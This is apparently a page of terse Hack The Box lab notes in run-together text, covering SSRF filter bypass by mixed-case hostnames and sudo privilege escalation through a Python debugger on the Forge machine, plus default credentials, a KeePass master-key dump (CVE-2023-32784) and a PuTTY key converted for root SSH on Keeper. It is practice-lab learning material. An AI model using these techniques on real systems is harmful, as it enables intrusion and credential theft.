forge.htbwe can upload file from machine as well as from URL & visitingadmin.forge.htbsays : onlu localhost allowedChecking
admin.forge.htbvia upload via URL got succeeded : vulnerable to SSRFcheck the URL
http://admin.forge.htbusinghttp://forge.htbSSRF fails ⇒ try with both upper/lower case :
AdMin.ForGe.hTbcase-injection
After visiting the link, website gives another obfuscated link which not work in brower
Direct visit fails ⇒ try with curl OR with both curl + base64 encode
This reveals some good information :
Crafting final payload
SSH shell as user
user, for privesc i run sudo -l which gives/opt/remote-manage.pyThis scripts
has a password ,
some option which we can run (1,2,3,4)
starts on any random port when executed
and if input is beside the given number, it starts PDB automatically
to deal with it we need another session and have to listen the same port .
In last enter any random output , the scripts break on other have and give , insert rev-shell
Horizontal
Shibboleth
Writer
Pandora
Meta
Paper
Keeper
Default Creds || Privesc ⇒ Keepass (CVE-2023-32784) | Putty-Key ⇒ openssh convert
On website
request ticketeris running ofBest practicalwith login form.Default creds gives access , inside that under /user directory i am able to find password for user
LisaAfter SSH , inside home directory able to find file.zip , which on extract gives
Keepassdump &kdbx file.For dumping password/key i used https://github.com/vdohney/keepass-password-dumper exploit , later use the master-key on file.kdbx using
kpcliThe above part done with dotnet version 7.0Enumeration gives
PUTTY-keyfor user root , Convert Puttykey to ssh and got the shell as root
Last updated